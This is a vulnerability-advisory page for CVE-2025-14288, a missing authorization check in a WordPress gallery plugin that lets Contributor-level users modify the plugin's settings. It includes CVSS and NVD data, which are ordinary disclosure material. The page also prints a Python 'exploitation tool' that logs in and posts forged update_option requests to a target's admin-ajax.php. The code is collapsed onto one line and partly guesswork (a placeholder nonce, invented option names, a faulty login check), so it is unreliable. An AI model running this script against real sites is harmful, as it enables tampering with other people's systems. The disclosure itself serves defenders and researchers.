Security Vulnerability Report
中文
CVE-2025-14288 CVSS 4.3 MEDIUM

CVE-2025-14288

Published: 2025-12-13 16:16:48
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Gallery Blocks with Lightbox. Image Gallery, (HTML5 video , YouTube, Vimeo) Video Gallery and Lightbox for native gallery plugin for WordPress is vulnerable to unauthorized modification of plugin settings in all versions up to, and including, 3.3.0. This is due to the plugin using the `edit_posts` capability check instead of `manage_options` for the `update_option` action type in the `pgc_sgb_action_wizard` AJAX handler. This makes it possible for authenticated attackers, with Contributor-level access and above, to modify arbitrary plugin settings prefixed with `pgc_sgb_*`.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

The Gallery Blocks with Lightbox插件 < 3.3.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # CVE-2025-14288 PoC - Gallery Blocks Plugin Privilege Escalation # Target: WordPress site with Gallery Blocks plugin <= 3.3.0 TARGET_URL = "https://target-site.com/wp-admin/admin-ajax.php" USERNAME = "attacker_contributor" PASSWORD = "password123" def exploit_cve_2025_14288(): """ Exploit for CVE-2025-14288: Gallery Blocks Plugin Unauthorized Settings Modification This vulnerability allows authenticated users with Contributor-level access to modify arbitrary plugin settings prefixed with 'pgc_sgb_*' due to improper capability checks in the pgc_sgb_action_wizard AJAX handler. The plugin uses 'edit_posts' capability check instead of 'manage_options' for the 'update_option' action type. """ # Step 1: Authenticate and get nonce session = requests.Session() # Login to WordPress login_data = { 'log': USERNAME, 'pwd': PASSWORD, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } login_response = session.post( f"{TARGET_URL.replace('/admin-ajax.php', '/wp-login.php')}", data=login_data ) if 'wordpress_logged_in' not in session.cookies: print("[-] Login failed") return False print("[+] Login successful as Contributor") # Step 2: Modify arbitrary plugin settings # The vulnerable action is 'pgc_sgb_action_wizard' with action_type 'update_option' exploit_data = { 'action': 'pgc_sgb_action_wizard', 'action_type': 'update_option', 'option_name': 'pgc_sgb_arbitrary_setting', # Any pgc_sgb_* option 'option_value': 'malicious_value', 'nonce': 'any_value_if_not_properly_validated' # If nonce check is also flawed } # Alternative: Try to modify known sensitive options sensitive_options = [ 'pgc_sgb_settings', 'pgc_sgb_api_keys', 'pgc_sgb_configuration' ] for option in sensitive_options: exploit_data['option_name'] = option exploit_data['option_value'] = json.dumps({ 'modified': True, 'attack_vector': 'CVE-2025-14288' }) response = session.post(TARGET_URL, data=exploit_data) if response.status_code == 200: print(f"[+] Successfully modified option: {option}") print(f"[+] Response: {response.text}") return True if __name__ == "__main__": print("=" * 60) print("CVE-2025-14288 Exploitation Tool") print("Gallery Blocks Plugin <= 3.3.0 Unauthorized Settings Modification") print("=" * 60) exploit_cve_2025_14288()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14288", "sourceIdentifier": "[email protected]", "published": "2025-12-13T16:16:48.310", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Gallery Blocks with Lightbox. Image Gallery, (HTML5 video , YouTube, Vimeo) Video Gallery and Lightbox for native gallery plugin for WordPress is vulnerable to unauthorized modification of plugin settings in all versions up to, and including, 3.3.0. This is due to the plugin using the `edit_posts` capability check instead of `manage_options` for the `update_option` action type in the `pgc_sgb_action_wizard` AJAX handler. This makes it possible for authenticated attackers, with Contributor-level access and above, to modify arbitrary plugin settings prefixed with `pgc_sgb_*`."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/simply-gallery-block/tags/3.2.8/plugin.php#L593", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3418101/simply-gallery-block/trunk/plugin.php?old=3415010&old_path=simply-gallery-block%2Ftrunk%2Fplugin.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/60ab0311-888c-46ae-98fe-9e7d4dfe13bf?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.